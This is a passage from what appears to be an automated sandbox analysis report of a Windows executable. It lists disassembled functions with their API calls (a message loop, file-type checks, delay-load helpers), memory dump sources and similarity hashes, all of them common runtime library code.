                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00421B3E), ref: 0042DD92
                                                                • Part of subcall function 0042B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                                • Part of subcall function 0042B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                                • Part of subcall function 0042B568: IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                                • Part of subcall function 0042B568: TranslateMessage.USER32(?), ref: 0042B5AC
                                                                • Part of subcall function 0042B568: DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 26384babe31eebbf60032730609f5bf7ab6f02dbfe6ca4a70db97dc43feea32b
                                                              • Instruction ID: 2076b56287998263e6beede8d49c1185d56b5be391ef85206b6293bc99638e04
                                                              • Opcode Fuzzy Hash: 26384babe31eebbf60032730609f5bf7ab6f02dbfe6ca4a70db97dc43feea32b
                                                              • Instruction Fuzzy Hash: CAD09E31244300FAD6012B52DD06F0A7BE2EB88B09F404559B284740B28A76AD61EF19
                                                              Function 0042E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 0042E5E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: 3fa0ea839b8a3718661af65d4229c0ff68ffea15ba59dbe090c6d4f639b003bf
                                                              • Instruction ID: f13945102937bbac0898db191a2bedf209f0e1602f653935ebecb6d6515cabc8
                                                              • Opcode Fuzzy Hash: 3fa0ea839b8a3718661af65d4229c0ff68ffea15ba59dbe090c6d4f639b003bf
                                                              • Instruction Fuzzy Hash: EBD0A9B03902A0AFC602EBFFB9827153350B321708FD40027B14C825A1CB7C40C5C60E
                                                              Function 004198BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,004197BE), ref: 004198C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: b3af3531f681f0275bcc1d0f0c2555ecf1fbeb209f128011755d8f4d7bb53287
                                                              • Instruction ID: 762ffb9570b1acb84b1fe62419ea1ce5b426609e205f710f56098ade2b5d1dfc
                                                              • Opcode Fuzzy Hash: b3af3531f681f0275bcc1d0f0c2555ecf1fbeb209f128011755d8f4d7bb53287
                                                              • Instruction Fuzzy Hash: 69C01234410105858E206B2498540D67311AB533667B48795C02C851A1C326CCDBEA15
                                                              Function 0042E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: dae6ea2065bb527b1685ba68d4b33f4c5ee7e929d9dbbb6501712b6b54e2a3fa
                                                              • Instruction ID: 44698585c2c01655e3e3a4440f4ac9c6138f406c1b9fcb85cdf2c26079441270
                                                              • Opcode Fuzzy Hash: dae6ea2065bb527b1685ba68d4b33f4c5ee7e929d9dbbb6501712b6b54e2a3fa
                                                              • Instruction Fuzzy Hash: 07B012E135A060BC3144E1073C02D37020CC0C2B22371C02FFC48D2080E88C4C05143F
                                                              Function 0042E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 35f9bc29a8bd851ea0e3c4144002fcb017aebf8fc806ee014811733284492aa1
                                                              • Instruction ID: cba290f9e246eac17d3ffdafed68aa7fb305e3c0a829d019b96e2db9e132ce29
                                                              • Opcode Fuzzy Hash: 35f9bc29a8bd851ea0e3c4144002fcb017aebf8fc806ee014811733284492aa1
                                                              • Instruction Fuzzy Hash: ECB012E135A0707C3144E1073D02D77020CC0C2B22371C02FF908D2080E88C0C0A143F
                                                              Function 0042E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 8281c76a8bf000e07d2edb0f0279be40471c64aa4e824eede4fdff62e15a6edb
                                                              • Instruction ID: 4d35f6efdd5d36ce7e3da10f7017444b47dd94cf29d4b54b815659157c327f89
                                                              • Opcode Fuzzy Hash: 8281c76a8bf000e07d2edb0f0279be40471c64aa4e824eede4fdff62e15a6edb
                                                              • Instruction Fuzzy Hash: 1EB092A135A060BC3144E1072802D360208C082B22371C02FF848C2081E88C4A01147B
                                                              Function 0042E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d02b20f1440a7186343460469028726fa77b21339d3231c53f093f02cdecb5ad
                                                              • Instruction ID: 98802b52e36d0eb1e3a9cb29e2027f88f4fd724bbbc74fca448041ac7f67d550
                                                              • Opcode Fuzzy Hash: d02b20f1440a7186343460469028726fa77b21339d3231c53f093f02cdecb5ad
                                                              • Instruction Fuzzy Hash: 4CB012C136A0207D314461973C02D77034CC0C1B253B2C02FF408C2080F84C0C45143F
                                                              Function 0042E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4bd65c8562562adfc40b04dc863649a9236dd5b951d59003d9361a0bcc19cc44
                                                              • Instruction ID: 17717d9e96aa2451fd38497bda27772fa71c334abf57b42a1d2c30bccfd87f19
                                                              • Opcode Fuzzy Hash: 4bd65c8562562adfc40b04dc863649a9236dd5b951d59003d9361a0bcc19cc44
                                                              • Instruction Fuzzy Hash: 2FB0928136A0207C314461966902D36021CC081B153B6C22FF408C2080E84C0946143E
                                                              Function 0042E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3108e96e5541dd167a27948471c2048decde119ef8345d4038a74d32725fac4d
                                                              • Instruction ID: 45dcfd52b886d74b7b9b93038a26b222bdbfdc41f0238591fb98c64f53d02cb7
                                                              • Opcode Fuzzy Hash: 3108e96e5541dd167a27948471c2048decde119ef8345d4038a74d32725fac4d
                                                              • Instruction Fuzzy Hash: 71B012C136A1207C318461977C03D37021CC0C1B153B6C22FF408C2480F84C0C85143E
                                                              Function 0042E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3591b8c07a515d0c55c961c454bbdf857f154c1100a0ee5da798be70d90d1330
                                                              • Instruction ID: 0aea5a85eece1e2038eb56b1c2b4d6eac8aef3279865e22ca2d8478b176df0af
                                                              • Opcode Fuzzy Hash: 3591b8c07a515d0c55c961c454bbdf857f154c1100a0ee5da798be70d90d1330
                                                              • Instruction Fuzzy Hash: 91A001E63AA1627D3148A2537D46D3B021DD4C2B6A3B6952FF865A6481AC881846187B
                                                              Function 0042E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 450b3810c72f3f2a590fef382e4256cb92d913e03ed9791eecdd8f04c71c3ea1
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 450b3810c72f3f2a590fef382e4256cb92d913e03ed9791eecdd8f04c71c3ea1
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              Function 0042E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 037d7569e41b96ef08617f6b4e0616be0b58a29d6058900bfdeffa877d91552c
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 037d7569e41b96ef08617f6b4e0616be0b58a29d6058900bfdeffa877d91552c
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              Function 0042E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9cac69b61d3cc2f9459a49d7631e181f7ed2f371fc664e68b2d2c07d042a9a36
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 9cac69b61d3cc2f9459a49d7631e181f7ed2f371fc664e68b2d2c07d042a9a36
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              Function 0042E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0a457e84263c6c6c98d77b4c3a4303f1ca8bd874f97144826432f264afdb95be
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 0a457e84263c6c6c98d77b4c3a4303f1ca8bd874f97144826432f264afdb95be
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              Function 0042E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fa57e8efa6d058c05b9eee2dee6c0229589bed9e4cdca9e07428881e0e68036e
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: fa57e8efa6d058c05b9eee2dee6c0229589bed9e4cdca9e07428881e0e68036e
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              Function 0042E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
